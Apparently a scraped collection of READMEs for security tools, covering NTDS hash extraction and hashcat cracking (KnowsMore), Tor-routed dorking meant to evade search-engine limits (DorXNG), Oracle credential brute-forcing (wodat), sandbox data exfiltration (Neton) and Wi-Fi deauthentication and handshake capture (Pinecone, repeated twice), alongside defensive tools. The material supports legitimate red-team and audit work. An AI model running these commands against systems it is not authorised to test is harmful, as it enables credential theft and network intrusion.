KnowsMore officially supports Python 3.8+.
knowsmore --stats
This command will produce several statistics about the passwords like the output bellow
KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db
[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+
[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+
[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+
pip3 install --upgrade knowsmore
Note: If you face problem with dependency version Check the Virtual ENV file
There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:
All data are stored in a SQLite Database
knowsmore --create-db
We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface
# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip
# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json
Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.
# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678
Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.
Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry
knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM
Note: First use the secretsdump to extract ntds hashes with the command bellow
secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name
After that import
knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds
knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name
First extract all hashes to a txt file
# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"
# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
In order to crack the hashes, I usually use hashcat
with the command bellow
# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"
# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a
knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt
Note: Change clientCompanyName to name of your company
As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.
Note: This command will keep all generated statistics and imported user data.
knowsmore --wipe
During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database
knowsmore --user-pass --username administrator --password Sec4US@2023
# or adding the company name
knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us
Integrate all credentials cracked to Neo4j Bloodhound database
knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456
To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.
server.bolt.listen_address=0.0.0.0:7687
DorXNG is a modern solution for harvesting OSINT
data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.
Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness
configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.
The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3
database.
We have enabled every supported upstream search engine that allows advanced search operator queries:
Google
DuckDuckGo
Qwant
Bing
Brave
Startpage
Yahoo
For more information about what search engines SearXNG supports See: Configured Engines
Install DorXNG
git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h
Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist
option with DorXNG. See: server.lst
docker run researchanddestroy/searxng:latest
If you would like to build the container yourself:
git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>
By default DorXNG has a hard coded server
variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2
. This can be changed, or overwritten with --server
or --serverlist
.
Start Issuing Search Queries
./DorXNG.py -q 'search query'
Query the DorXNG Database
./DorXNG.py -D 'regex search string'
-h, --help show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output
Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. ο
Keep your DorXNG SQL database file and rerun your command, or use the --loop
switch to iterate the main function repeatedly. ο
Most often, the more passes you make over a search query the more results you'll find. ο»
Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT
project after all. οο
Each search query you make is being issued to 7
upstream search providers... Especially with --concurrent
queries this generates a lot of upstream requests... So have patience.
Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database
switch to specify a database filename, the default filename is dorxng.db
. This probably doesn't matter for most, but if you want to keep your OSINT
investigations seperate it's there for you.
Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests
responses from upstream search providers on that specific Tor circuit.
If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:
HTTP/500
response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one. HTTP/504 Gateway Time-out
response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!
There really isn't a reason to run a ton of these containers... Yet... ο How many you run really depends on what you're doing. Each container uses approximately 1.25GBs
of RAM.
Running one container works perfectly fine, except you will likely miss search results. So use --loop
and do not disable --timeout
.
Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.
When running --serverlist
mode disable the --timeout
feature so there is no delay between requests (The default delay interval is 4 seconds).
Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... οο
The more recursions your command goes through without returning to main
the more memory the process will consume. You may come back to find that the process has crashed with a Killed
error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. οο
If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...
Those Python Stack Frames are Thicc... οο
We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.
The --limitdatabase
option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop
to break deep recursive iteration inside iterator.py and restart from main
right where you left off.
Once you have a series of database files you can merge them all (one at a time) with --mergedatabase
. You can even merge them all into a new database file if you specify an unused filename with --database
.
The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py
We've already run through it for you... ο Our ghdb.db
file contains over one million entries and counting!  You can download it here ghdb.db if you'd like a copy. ο
Example of querying the ghdb.db
database:
./DorXNG.py -d ghdb.db -D '^http.*\.sql$'
A rewrite of DorXNG
in Golang
is already in the works. ο (GorXNG
? | DorXNGNG
?) ο
We're gonna need more dorks... ο Check out DorkGPT ο
Single Search Query
./DorXNG.py -q 'search query'
Concurrent Search Queries
./DorXNG.py -q 'search query' -c4
Page Iteration Mode
./DorXNG.py -q 'search query' -n4
Iterative Concurrent Search Queries
./DorXNG.py -q 'search query' -c4 -n64
Server List Iteration Mode
./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0
Query List Iteration Mode
./DorXNG.py -Q query.lst -c4 -n64
Query and Server List Iteration
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0
Main Function Loop Iteration Mode
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4
Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries
./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10
Merging a Database (One at a Time) into a New Database File
./DorXNG.py -d new-database.db -m dorxng.db
Merge All Database Files in the Current Working Directory into a New Database File
for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done
Query a Database
./DorXNG.py -d new-database.db -D 'regex search string'
ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
git clone https://github.com/HalilDeniz/ICMPWatch.git
pip install -r requirements.txt
python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
-v
or --verbose
: Show verbose packet details.-t
or --timeout
: Sniffing timeout in seconds (default is 300 seconds).-f
or --filter
: BPF filter for packet sniffing (default is "icmp").-o
or --output
: Output file to save captured packets.--type
: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).--src-ip
: Source IP address to filter.--dst-ip
: Destination IP address to filter.-i
or --interface
: Network interface to capture packets (required).-db
or --database
: Store captured packets in an SQLite database.-c
or --capture
: Capture file to save packets in pcap format.Press Ctrl+C
to stop the sniffing process.
python icmpwatch.py -i eth0
python dnssnif.py -i eth0 -o icmp_results.txt
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
python icmpwatch.py -i eth0 --type 8
python icmpwatch.py -i eth0 -c captured_packets.pcap
Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.
SAST (Static Analysis Security Testing) capabilities:
SCA (Software Composition Analysis) capabilities:
Extra
Scan customization | Analysis workbench | Rule pack edition |
---|---|---|
Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.
Make sure you have docker-composer installed on the system, and the docker daemon is running. The application can then be easily executed in a docker container. The steps:
Get the code
$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx
Start the app in Docker
$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d
Visit http://localhost:5000
in your browser. The app should be up & running.
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).
Install using pip
$ pip install gunicorn supervisor
Start the app using gunicorn binary
$ supervisord -c supervisord.conf
Visit http://localhost:8001
in your browser. The app should be up & running.
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Get the code
$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx
Install virtualenv modules
$ virtualenv env
$ source env/bin/activate
Install Python modules
$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt
Install additionnal requirements
# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan
A Redis server is required to queue security scans. Install the
redis
package with your favorite distro package manager, then:
$ redis-server
Set the FLASK_APP environment variable
$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development
Start the celery worker process
$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach
Start the application (development mode)
$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000
Access grepmarx in browser: http://127.0.0.1:5000/
Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.
Grepmarx - Provided by Orange Cyberdefense.
Neton is a tool for getting information from Internet connected sandboxes. It is composed by an agent and a web interface that displays the collected information.
The Neton agent gets information from the systems on which it runs and exfiltrates it via HTTPS to the web server.
Some of the information it collects:
All this information can be used to improve Red Team artifacts or to learn how sandboxes work and improve them.
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 manage.py migrate
python3 manage.py makemigrations core
python3 manage.py migrate core
python3 manage.py createsuperuser
python3 manage.py runserver
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout server.key -out server.crt
Launch gunicorn:
./launch_prod.sh
Build solution with Visual Studio. The agent configuration can be done from the Program.cs class.
In the sample data folder there is a sqlite database with several samples collected from the following services:
To access the sample information copy the sqlite file to the NetonWeb folder and run the application.
Credentials:
raccoon
jAmb.Abj3.j11pmMa
Simple port of the popular Oracle Database Attack Tool (ODAT) (https://github.com/quentinhardy/odat) to C# .Net Framework. Credit to https://github.com/quentinhardy/odat as lots of the functionality are ported from his code.
I take not responsibility for your use of the software. Development is done in my personal capacity and carry no affiliation to my work.
The general command line arguments required are as follow:
wodat.exe COMMAND ARGGUMENTS
COMMAND (ALL,BRUTECRED,BRUTESID,BRUTESRV,TEST,DISC)
-server:XXX.XXX.XXX.XXX -port:1520
-sid:AS OR -srv:AS
-user:Peter -pass:Password
To test if a specific credential set works.
wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan
See the outline on modules for further usage. The tool will always first check if the TNS listener that is targeted works.
Module performs wordlist SID guessing attack if not successful will ask for brute force attack.
wodat.exe BRUTESID -server:XXX.XXX.XXX.XXX -port:1521
Module performs wordlist ServiceName guessing attack if not successful will ask for brute force attack.
wodat.exe BRUTESRV -server:XXX.XXX.XXX.XXX -port:1521
Module performs wordlist password based attack. The following options exist:
A - username:password combolist with no credentials given during arguments
B - username list with password given in arguments
C - password list with username given in arguments
D - username as password with username list provided
To perform a basic attack with a given file that has username:password combos.
wodat.exe BRUTECRED -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE
Module tests if the given connection string can connect successfully.
wodat.exe TEST -server:XXX.XXX.XXX.XXX -port:1521 -sid:XE -user:peter -pass:pan
Module will perform discovery against provided CIDR range or file with instances. Note, only instances with valid TNS listeners will be returned. Testing a network range will be much faster as itβs processed in parallel.
wodat.exe DISC
Instances to test must be formatted as per the below example targets.txt
:
192.168.10.1
192.168.10.5,1521
Not implemented yet.
Not implemented yet.
You can grab automated release build from the GitHub Actions or build yourself using the following commands:
nuget restore wodat.sln
msbuild wodat.sln -t:rebuild -property:Configuration=Release
Some general notes: The Oracle.ManagedDataAccess.dll
library will have to be copied with the binary. I'm looking at ways of embedding it.
Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.
This tool is designed for educational and research purposes only. Only use it with explicit permission.
For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:
apt-get install python3
.apt-get install dnsmasq
.apt-get install hostapd-wpe
. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt
in the project root folder.
For starting Pinecone, execute python3 pinecone.py
from within the project root folder:
root@kali:~/pinecone# python pinecone.py
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >
Pinecone is controlled via a Metasploit-like command-line interface. You can type help
to get the list of available commands, or help 'command'
to get more information about a specific command:
pinecone > help
Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias
Undocumented commands:
======================
back run stop
pinecone > help use
Usage: use module [-h]
Interact with the specified module.
positional arguments:
module module ID
optional arguments:
-h, --help show this help message and exit
Use the command use 'moduleID'
to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:
pinecone > use
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >
Every module has options, that can be seen typing help run
or run --help
when a module is activated. Most modules have default values for their options (check them before running):
pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)
When a module is activated, you can use the run [options...]
command to start its functionality. The modules provide feedback of their execution state:
pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...
If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop
command when the module is running:
back
command. You can also activate another module issuing the use
command again. Shell commands may be executed with the command shell
or the !
shortcut:
pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md
Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.
Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.
This tool is designed for educational and research purposes only. Only use it with explicit permission.
For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:
apt-get install python3
.apt-get install dnsmasq
.apt-get install hostapd-wpe
. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt
in the project root folder.
For starting Pinecone, execute python3 pinecone.py
from within the project root folder:
root@kali:~/pinecone# python pinecone.py
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >
Pinecone is controlled via a Metasploit-like command-line interface. You can type help
to get the list of available commands, or help 'command'
to get more information about a specific command:
pinecone > help
Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias
Undocumented commands:
======================
back run stop
pinecone > help use
Usage: use module [-h]
Interact with the specified module.
positional arguments:
module module ID
optional arguments:
-h, --help show this help message and exit
Use the command use 'moduleID'
to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:
pinecone > use
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >
Every module has options, that can be seen typing help run
or run --help
when a module is activated. Most modules have default values for their options (check them before running):
pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)
When a module is activated, you can use the run [options...]
command to start its functionality. The modules provide feedback of their execution state:
pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...
If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop
command when the module is running:
back
command. You can also activate another module issuing the use
command again. Shell commands may be executed with the command shell
or the !
shortcut:
pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md
Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.